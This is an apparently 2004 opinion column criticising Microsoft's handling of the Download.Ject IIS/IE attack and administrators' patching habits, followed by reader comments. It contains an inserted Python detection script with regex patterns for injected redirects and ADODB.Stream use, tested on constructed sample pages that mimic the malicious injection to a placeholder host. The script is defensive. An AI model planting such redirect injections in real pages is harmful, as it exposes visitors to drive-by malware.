A Trustworthy Response?

Everyone--Microsoft and its customers--needs to get more serious about the virus threat.

Analysis: Microsoft recently had another opportunity to demonstrate its Trustworthy Computing philosophy when the Download.Ject virus began infecting unpatched IIS 5.0 servers and various versions of Internet Explorer. Download.Ject is a novel virus in that it attacks along two vectors: It first infects an IIS 5.0 server using a known vulnerability (which has been patched for a while; shame on affected system administrators for not maintaining their systems). The server-side infection installs a JavaScript that redirects users to another Web server. That Web server, based in Russia, exploits the IE vulnerability to install a keystroke logger, capturing passwords and lots of other sensitive information. The IE vulnerability has to do with the ActiveX Data Objects' ADODB.Stream object, which represents a file in memory.
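A defender-side content check for the two-vector chain described above, added here as an example and not code from Microsoft or this magazine: it scans HTML a server hands out for script pulled from an untrusted host, inline redirects to an offsite URL, and script that instantiates ADODB.Stream. The trusted-host list, the sample pages and the 203.0.113.7 address are constructed assumptions, and the patterns are illustrative rather than Download.Ject's actual signature.

```python
import re
from urllib.parse import urlparse

# Assumption: the hosts this site legitimately loads script from (constructed).
TRUSTED_HOSTS = {"www.example.com", "static.example.com"}

# Script tags pulled from another host, inline redirects, and ADODB.Stream use.
SCRIPT_SRC_RE = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
INLINE_SCRIPT_RE = re.compile(r'<script[^>]*>(.*?)</script>', re.I | re.S)
REDIRECT_RE = re.compile(r'\blocation(?:\.href)?\s*=\s*["\']([^"\']+)', re.I)
ADODB_RE = re.compile(r'ActiveXObject\s*\(\s*["\']ADODB\.Stream["\']', re.I)


def _offsite(url):
    """True if the URL names a host outside TRUSTED_HOSTS (relative URLs pass)."""
    host = urlparse(url).hostname
    return bool(host) and host.lower() not in TRUSTED_HOSTS


def audit_page(html):
    """Return (finding, detail) pairs for one served page; [] means clean."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(html):
        if _offsite(src):
            findings.append(("external-script", src))
    for body in INLINE_SCRIPT_RE.findall(html):
        for target in REDIRECT_RE.findall(body):
            if _offsite(target):
                findings.append(("offsite-redirect", target))
        if ADODB_RE.search(body):
            findings.append(("adodb-stream", "inline script instantiates ADODB.Stream"))
    return findings


# Constructed sample pages; 203.0.113.7 is a documentation (TEST-NET-3) address.
CLEAN_PAGE = '<html><body><p>Hello</p><script src="/js/site.js"></script></body></html>'
INJECTED_PAGE = CLEAN_PAGE + '<script>document.location = "http://203.0.113.7/ie.htm";</script>'
EXTERNAL_SCRIPT_PAGE = CLEAN_PAGE + '<script src="http://203.0.113.7/x.js"></script>'
ADODB_PAGE = '<html><script>var s = new ActiveXObject("ADODB.Stream");</script></html>'

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE),
                       ("external", EXTERNAL_SCRIPT_PAGE), ("adodb", ADODB_PAGE)]:
        print(name, audit_page(page) or "clean")
```

Run against a crawl of your own site's pages, a non-empty result for any page is a reason to compare the served content with what is actually on disk.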

Microsoft's first response to Download.Ject was, in hindsight, a bit lackluster. It proudly announced, near the end of June, that it had taken down the Russian Web server. While that surely made Microsoft feel good, and immediately prevented any more infections, it didn't actually solve the problem. We know from experience with NetSky and MyDoom that Download.Ject variants were (and are) inevitable, and those variants will simply redirect users to a different Web server. Microsoft's second response, on July 2, was to issue a patch for IE, which didn't fix the problem. Instead, it essentially hacks the registry to disable the ADODB.Stream object (Knowledge Base article 870669 describes how to do it manually), defeating the vector Download.Ject uses but not fixing the vulnerability. It's all too feasible that some future Download.Ject variant could re-enable the vulnerability and continue to exploit it.

That's assuming, of course, that users bother to install the patch to begin with. They won't. We know they won't, because Download.Ject couldn't have spread at all if it weren't for unpatched IIS 5.0 systems. It's difficult to say how many times someone has to jump up and down on a table to attract administrators' attention to the importance of patch management. And the rhetoric about Microsoft's failure to provide comprehensive patch management tools, while true, is beginning to ring hollow: Keeping up with patches is an administrator's job. It's safe to assume that if administrators can't be bothered to patch a few Web servers, they won't be bothered to patch a few thousand Web browsers, either.

Microsoft does promise a long-term, true solution in the future. Apparently the holdup is in providing a tested, supportable patch for every extant version of IE. While I'm sure Microsoft isn't holding back on us, it's still difficult to imagine the circumstances which prevent a company with thousands of programmers from creating an effective patch more quickly. Still, perhaps it's no more difficult to imagine than a world where network administrators can't be bothered to turn on Automatic Updates for their Web servers and to subscribe to Microsoft's security bulletins.

What could Microsoft or we as an industry have done differently to prevent this potentially damaging Trojan?

First, administrators need to get on top of patch management. It's difficult to believe that the examples of Slammer and Blaster—two viruses which exploited already-patched vulnerabilities—haven't been sufficient. Clearly, administrators who haven't been hit yet think they never will be. It's a shame that they won't be goaded into doing the patch management part of their job—a job which, by the way, administrators all the way back to the mainframe days have had to deal with—until their environments are brutally hacked.

Second, Microsoft needs to get a plan, and ideally a dedicated team, in place for critical incident response. For example, the first patch Microsoft issued could have included a recommendation to block access to the IP address the server-side exploit redirected users to. It's hard to tell if that would have penetrated the ennui administrators seem to have regarding Microsoft security alerts; Microsoft's Web site has been crawling with Download.Ject warnings in the past few weeks and I'm sure there are still vulnerable IIS 5.0 servers out there.

A dedicated team might also help Microsoft issue actual patches, rather than "resiliency boosts," when difficult-to-patch problems arise. Management within Microsoft also needs to be willing to put the brakes on all future development, if necessary, to get patches out as quickly as possible. That's an incredibly difficult decision to make within any company, but the sheer number of people who are affected by any Windows-targeted attack makes it a necessary decision. It's great that Microsoft went after the Russian Web server; antivirus Web sites, however, are telling me that Download.Ject was discovered in February. Symantec provided virus definitions on June 16. As I'm writing this, nearly a month later, IE still hasn't been permanently patched.

So what's the bottom line? Everyone—Microsoft and its customers—needs to get more serious about the virus threat. It's a simple miracle that effective viruses like MyDoom, Slammer, Blaster, and Download.Ject have caused as little damage as they have. Microsoft must continue to react quickly and decisively, and its customers must stop relying on Microsoft to "make it all better," and start taking more responsibility for the security of their own systems.

About the Author

With more than fifteen years of IT experience, Don Jones is one of the world’s leading experts on the Microsoft business technology platform. He’s the author of more than 35 books, including Windows PowerShell: TFM, Windows Administrator’s Scripting Toolkit, VBScript WMI and ADSI Unleashed, PHP-Nuke Garage, Special Edition Using Commerce Server 2002, Definitive Guide to SQL Server Performance Optimization, and many more. Don is a top-rated and in-demand speaker and serves on the advisory board for TechMentor. He is an accomplished IT journalist with features and monthly columns in Microsoft TechNet Magazine, Redmond Magazine, and on Web sites such as TechTarget and MCPMag.com. Don is also a multiple-year recipient of Microsoft’s prestigious Most Valuable Professional (MVP) Award, and is the Editor-in-Chief for Realtime Publishers.

Reader Comments:

Fri, Jul 30, 2004 Anonymous Anonymous

I find it strange the way some people think. The virus happens in Feb. It takes a virus co. 4 mos. to come out with a def. and it takes writers 5 mos. to write about it. And everyone hollers MS should have fixed IE the day after it happens. For myself I think MS is working its tail off to ensure a bunch of fixes it's about to release is foolproof enough to help IE and XP, and all of this billions of people will get for free. I'm just a regular end user (used to toggle my data in with switches then moved up to the ELF 1802 based processor chip, thought MS was a great help and aid when it first came out...I still do) but I think MS does a heck of a lot more for me and millions of others like me, trying to give me a good, stable, reliable and safe OS and browser, etc., than tons of the software, firmware programmers and developers that have loads of commercial software ill written and designed as well as various hardware mfg cos. and most of those are not going to spend time, resources and money and give away major overhauls to millions for free. I have used several other OS's and browsers and have had fun and challenge with all of them and I think they are all pretty good stuff. But I continue to this day to rely on MS, it's been on each machine I've built and tied to the internet for years...from 300 baud dial to DSL. It's handled things for me, my children, grandchildren and even my great-grandchildren. It has been through a lot of use in my family to all points of the world. I have had an occasional virus, even had to scratch load. But those times were real rare, for the most part the sys (mach & OS) has run day after day year after year with little to no down time. Same thing at my job. But like everything else in this world, even love....it requires a little maintenance. 1st time I've posted at a site like this, I just happen to be reading the article and have gotten kind of tired of reading, seeing and hearing so much MS bashing happening everywhere.
Some people don't seem to understand that with the dynamics of this logistics field, there is never really a permanent fix. By its very nature, evolution in this monolithic giant promises to be an ongoing daily battle, to be dealt with using persistence and patience. I've noticed the majority that bashes MS do not post offerings of viable solutions, the big fix being replace browser or OS. This same group of folk, I wonder, do they haul their car to the wrecking yard if it fails to start, do they throw their TV away and buy another if a fuse blows, do they exchange homes if a switch fails to turn on a light?

Fri, Jul 30, 2004 Anonymous Anonymous

I agree that Microsoft owes us a quick and efficient patch that fully corrects the problem, not just a Band-Aid fix. However, the admins need to step up to the plate and apply those patches as soon as they're available. After all, if Microsoft released a fully-functional patch on the day a virus was discovered it wouldn't matter if it isn't installed.
The admins should also stop taking the easy way out (relying on IE) and install Firefox. Sure it means supporting another browser, but the support required for Firefox is minimal compared to fighting a new virus at all hours of the night, then restoring from backups to hopefully fix what the virus trashed.

Fri, Jul 30, 2004 Anonymous Anonymous

Your news does not give clear instructions on how to remove the virus. That would be better than sensational reasons, etc.
Would you not agree?

Michael Weissbraun

Thu, Jul 29, 2004 Anonymous Anonymous

The trustworthy response to IE security problems is to drop IE and get Mozilla Firefox (www.getfirefox.com).

Mozilla Firefox is more secure, and has a number of interesting features like tabbed browsing, google searches and pop-up blocking.

Moreover, Firefox won't let users execute downloaded executables, reducing the virus risk.

Download Firefox now! You won't look back.

www.getfirefox.com
